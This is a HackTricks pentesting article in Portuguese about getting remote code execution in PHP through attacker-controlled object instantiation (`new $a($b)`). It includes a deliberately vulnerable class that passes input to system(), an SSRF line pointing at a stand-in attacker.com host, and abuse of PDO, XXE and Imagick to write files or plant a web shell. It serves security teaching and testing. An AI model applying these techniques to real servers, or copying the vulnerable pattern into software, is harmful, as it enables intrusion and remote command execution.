hacktricks/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md

# PHP - RCE abusando da criação de objeto: new $\_GET\["a"]\($\_GET\["b"])

<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Participe do grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou do grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.

</details>

## Introdução

Na situação em que você pode criar um novo objeto arbitrário como `new $_GET["a"]($_GET["a"])`, você pode ser capaz de obter RCE, e [**este writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) expõe diferentes maneiras de conseguir RCE.

## RCE via Classes Personalizadas ou Autoload

Na construção `new $a($b)`, a **variável `$a` representa o nome da classe** para a qual o objeto será criado, e a variável **`$b` representa o primeiro argumento** que será passado para o construtor do objeto.

Se `$a` e `$b` vêm de GET/POST, eles podem ser **strings ou arrays de strings**. Se eles vêm de **JSON** ou de outro lugar, eles **podem ter outros tipos**, como objeto ou booleano.

Vamos considerar o seguinte exemplo:
```php
class App {
function __construct ($cmd) {
system($cmd);
}
}

# Additionally, in PHP < 8.0 a constructor might be defined using the name of the class
class App2 {
function App2 ($cmd) {
system($cmd);
}
}

# Vulnerable code
$a = $_GET['a'];
$b = $_GET['b'];

new $a($b);
```
Neste código, você pode definir `$a` como `App` ou `App2` e `$b` como `uname -a`. Após isso, o comando `uname -a` será executado.

Quando não existem classes exploráveis na sua aplicação, ou você tem a classe necessária em um arquivo separado que não é incluído pelo código vulnerável, você pode considerar as funções de **autoloading**.

**Funções de autoloading** são definidas registrando callbacks via `spl_autoload_register` ou definindo `__autoload`. Elas são chamadas quando uma instância de uma classe desconhecida está tentando ser criada.
```php
# An example of an autoloading function
spl_autoload_register(function ($class_name) {
include './../classes/' . $class_name . '.php';
});

# An example of an autoloading function, works only in PHP < 8.0
function __autoload($class_name) {
include $class_name . '.php';
};

# Calling spl_autoload_register with no arguments enables the default autoloading function, which includes lowercase($classname) + .php/.inc from include_path
spl_autoload_register();
```
Dependendo da versão do PHP e do código nas funções de carregamento automático, algumas maneiras de obter uma Execução Remota de Código via carregamento automático podem existir.

## RCE via Classes Internas

Quando você não tem classes personalizadas e carregamento automático, você pode confiar **apenas nas classes internas do PHP**.

Existem de 100 a 200 classes internas no PHP. O número delas depende da versão do PHP e das extensões instaladas. Todas as classes internas podem ser listadas através da função `get_declared_classes`, juntamente com as classes personalizadas:
```php
var_dump(get_declared_classes());
```
Classes com construtores úteis podem ser encontradas através da [API de reflexão](https://www.php.net/manual/en/book.reflection.php).

Exibindo construtores e seus parâmetros usando a API de reflexão: [https://3v4l.org/2JEGF](https://3v4l.org/2JEGF)

![](https://swarm.ptsecurity.com/wp-content/uploads/2022/07/2.png)

Se você controla **múltiplos parâmetros do construtor e pode chamar métodos arbitrários** depois, existem muitas maneiras de conseguir uma Execução Remota de Código. Mas se você pode passar **apenas um parâmetro e não tem nenhuma chamada** ao objeto criado, há **quase nada**.

Eu conheço apenas três maneiras de conseguir algo de `new $a($b)`.

### **SSRF + Deserialização Phar**

A classe `SplFileObject` implementa um construtor que permite conexão com qualquer URL local ou remota:
```
new SplFileObject('http://attacker.com/');
```
Isso permite SSRF. Além disso, SSRFs em PHP < 8.0 poderiam ser transformados em deserializações por meio de técnicas com o protocolo Phar.

### **Explorando PDOs**

A classe PDO tem outro construtor interessante:
```php
new PDO("sqlite:/tmp/test.txt")
```
O construtor `PDO` aceita strings DSN, permitindo-nos **conectar a qualquer banco de dados local ou remoto** usando **extensões de banco de dados instaladas**. Por exemplo, a extensão SQLite pode criar arquivos vazios.

### **SoapClient/SimpleXMLElement XXE**

No PHP ≤ 5.3.22 e ≤ 5.4.12, o construtor do SoapClient era **vulnerável a XXE**. O construtor do SimpleXMLElement também era vulnerável a XXE, mas exigia libxml2 < 2.9.

## RCE via Extensão Imagick

Verificando as **dependências** do **projeto** que você está tentando explorar, você poderia encontrar **novas classes** que poderiam ser **abusadas para executar comandos** criando um novo objeto. Neste caso, **Imagick** foi encontrado como útil para esse propósito.

### Analisador VID

O analisador VID permite escrever conteúdo arbitrário em um caminho arbitrário dentro do sistema de arquivos, o que permitiria a um atacante escrever um PHPshell em uma pasta acessível pela página web e obter RCE.

![](<../../../.gitbook/assets/image (157) (3).png>)

#### Analisador VID + Upload de Arquivo

Quando um arquivo é carregado para o PHP, ele é temporariamente armazenado em `/tmp/phpXXXXXX`. O analisador VID do Imagick com o protocolo **msl** permite **especificar curingas nos caminhos dos arquivos** (para que o arquivo carregado temporariamente possa ser facilmente acessado) e **copiá-lo para qualquer local arbitrário**.\
Esta é outra maneira de obter escrita de arquivo arbitrário dentro do sistema de arquivos:

![](<../../../.gitbook/assets/image (159).png>)

### Travamento do PHP + Força Bruta

O [**writeup original**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) explicou outra maneira de obter RCE **carregando arquivos com conteúdo específico** e fazendo o **servidor travar antes de deletar** esse arquivo e então **forçando bruta o nome** do arquivo temporário até que **Imagick execute código PHP arbitrário**.

No entanto, aparentemente o **truque de travamento** descoberto só **funcionava em uma versão antiga do ImageMagick**.

## Referências

* [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)

<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras maneiras de apoiar o HackTricks:

* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>